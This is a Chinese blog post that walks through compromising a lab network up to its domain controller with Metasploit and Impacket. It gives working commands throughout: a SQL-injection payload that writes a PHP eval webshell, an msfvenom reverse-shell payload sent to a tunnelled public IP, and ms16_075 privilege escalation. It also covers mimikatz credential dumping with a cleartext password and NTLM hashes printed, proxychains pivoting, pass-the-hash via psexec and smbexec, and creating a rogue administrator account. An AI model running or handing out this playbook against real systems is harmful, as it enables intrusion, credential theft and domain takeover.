msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 如何组建局域网,100人局域网需要多少带宽

    ’100人内规模网络100人内规模算小微企业,其实网络非常简单。直接购买一台设备就能解决问题,比如路由交换一体机或者路由交换安全一体机。如果网络接口不够用,再接一台二层交换机即可,二层交换机即插即用,无需任何配置(常见二层交换机华为5720S、华三5130S、锐捷2900E)。 网络拓扑与产品选型路由交换一体机比如RSR20-X-28,支持4个路由接口,最多…

    2023-07-11
  • 迅雷不能登录,迅雷不能登陆

    《迅雷不能登录之探究与思考》 一、问题的出现最近我在使用迅雷的时候,突然发现无法登录账号了。这让我感到有些困惑,因为之前一直都能正常登录,也没有进行过什么特殊的操作。我开始怀疑是不是迅雷的服务器出了问题,或者是我的账号出现了异常。 二、可能的原因分析1.服务器故障也许是迅雷的服务器出现了故障,导致无法正常处理登录请求。这种情况在互联网上并不罕见,很多大型的网…

    2025-10-20
  • qq网站登陆,qq账号登录网页

    《关于qq网站登陆的深入探讨》 一、qq网站登陆的基本流程我觉得qq网站登陆这个过程好像是一个很常见的操作呢,也许大家每天都在不知不觉中进行着。它的基本流程大概是这样的:我们打开浏览器,在地址栏中输入qq网站的地址,然后按下回车键。接着,页面就会加载出来,我们会看到qq登陆的界面。在这个界面上,通常会有账号输入框和密码输入框,我们需要将自己的qq账号和密码准…

    2025-11-12
  • 多多视频领现金是真的吗,拼多多看视频赚钱可以提现吗

    一、“宇宙的尽头是带货” “宇宙的尽头是带货”近年来成为广为流传的一句调侃。 的确,传统电商已经迈入低速增长阶段,在视频流时代,实现流量变现最快捷、最暴利的一种方式就是直播或视频带货。 而就在此时,拥有9亿用户的大平台拼多多也入局了短视频。 前几天,部分用户发现,原本在个人中心的“多多视频”升级到拼多多首页底部一级入口,取代了原来的“直播”。 而且用户每观看…

    2022-03-22
  • 英国皇室御用香水,英国香水品牌排行榜前十名

    经常逛杭州万象城的小伙伴会发现,B1楼层越来越香了。因为越来越多的香水香氛品牌在这个楼层亮相,其中不乏一些国外小众品牌。 就在前不久,诞生于1870年的英国百年香氛世家Penhaligon’s潘海利根全新旗舰店在此亮相。此前,Penhaligon’s潘海利根在上海、南京、深圳都开设有专柜,不过这一次,位于杭州万象城的全新旗舰店有着很多…

    2023-07-08 投稿
  • 绍兴俞氏族谱字辈(绍兴俞氏宗祠)

    1.皖南事变内情:国民党上官云相主动向叶挺军长示好,利用同学关系,麻痹叶挺,遂至皖南祸作。(毛泽东对付国民党的策略远比王明要高明。皖南事变就是一个例子。) 2 绍兴俞家:徐锡麟与俞廉三有远亲。俞廉三对其很看重。代徐捐官,又介绍其与陶成章五人至浙江巡抚满洲将军寿山处,托其批准他们到日本学习陆军。徐因近视,不能学陆军。又到湖北见俞廉三。俞介绍其到曾经下属安徽巡抚…

    2022-01-06 投稿
  • 合肥滴滴快车真实收入(合肥跑滴滴一个月能挣多少钱)

    新华社合肥5月8日电 题:网约车糊涂账 定价谁说了算——平台服务费抽成谜团追踪 新华社记者程士华、胡锐、何曦悦 市民吐槽网约车打车贵、司机抱怨平台抽成高,网约车平台收取服务费抽成究竟几何?你和司机对过账单吗? 新华社记者近日走访调查,对照乘客付款账单、司机收款账单明细,两者差距从25%至35%不等。围绕这些抽成,如何把“糊涂账”变为“明白账”?记者专访了网约…

    2021-11-06
  • 淘宝 注册时间,淘宝注册时间最早是哪一年

    《淘宝注册时间:探寻其背后的故事与影响》 在当今数字化的时代,淘宝作为中国最大的电子商务平台之一,其影响力无处不在。 而淘宝的注册时间,似乎是一个看似简单却又蕴含着诸多故事和影响的问题。 也许它是淘宝发展历程中的一个重要节点,也许它与淘宝的用户群体、市场地位等方面有着密切的关联。 那么,淘宝的注册时间究竟是何时呢?让我们一起来探寻一下。 一、淘宝的诞生与早期…

    2025-07-02
  • 人找钱不如钱找人(帮找钱贷款靠谱吗)

    有好几个朋友问“有没有办法在短期内赚到大钱,合法的”。 “合法的”三个字,说明他们被那句“赚大钱的方法都写在刑法里”整烦了。   “赚大钱的方法都写在刑法里”是一句抖机灵的回答,实际生活中还是有很多方法赚大钱的,要不然怎么那么多富豪是吧。   昨天说了,赚钱的三要素:努力、天赋、机遇。   不管怎么样,赚钱都离不开这三要素。 &…

    2021-12-30
  • 网上挣零花钱(网上挣零花钱的方法)

    在信息化时代,有很多网上的赚钱方法你可能不知道,现在互联网这么发达,想赚钱已经可以足不出户了,其实,不管用什么设备,只要自己有本事,单纯靠一个电脑、手机不是不可能,但也不是人人都可以,下面分享几个在家就可以赚钱的项目: 1.投稿 国内的一些知名的纸媒是有稿费的,一些学术类的网媒同样也是有稿费的,网上投稿,省了邮费,很快捷,一篇稿子可以投很多家。关键在于可不可…

    2022-01-20 投稿
  • 沟通技巧影响表达效果,影响表达的四个因素

    环顾生活周遭,总会发现有些人天生就能够凭着自己那三寸不烂之舌,在生活和工作当中混得“如鱼得水”。 相反,有些人日夜埋头苦干,却总是因为不善或不敢表达,说话常常词不达意而错失了很多机会,被当成“受气包”也是有口难言。 在今天的商业社会,沟通技巧已是一项不容置疑的致胜关键。根据一份访问两百在职人士的调查报告显示,超过 80% 受访者都表示口才对工作很重要。而所有…

    2022-05-01 投稿
  • rowcount,rowcount=0

    以下是一篇关于“rowcount”的文章: 一、什么是rowcount “rowcount”这个词,也许大家并不陌生,但它到底是什么呢?从字面上理解,“row”指的是行,“count”则是计数的意思。所以,“rowcount”可能就是指对行进行计数的操作或者结果。 我觉得它在数据库领域中应用得比较广泛。就好像我们在一个大型的图书馆里,想要知道有多少本书,那么…

    2025-08-01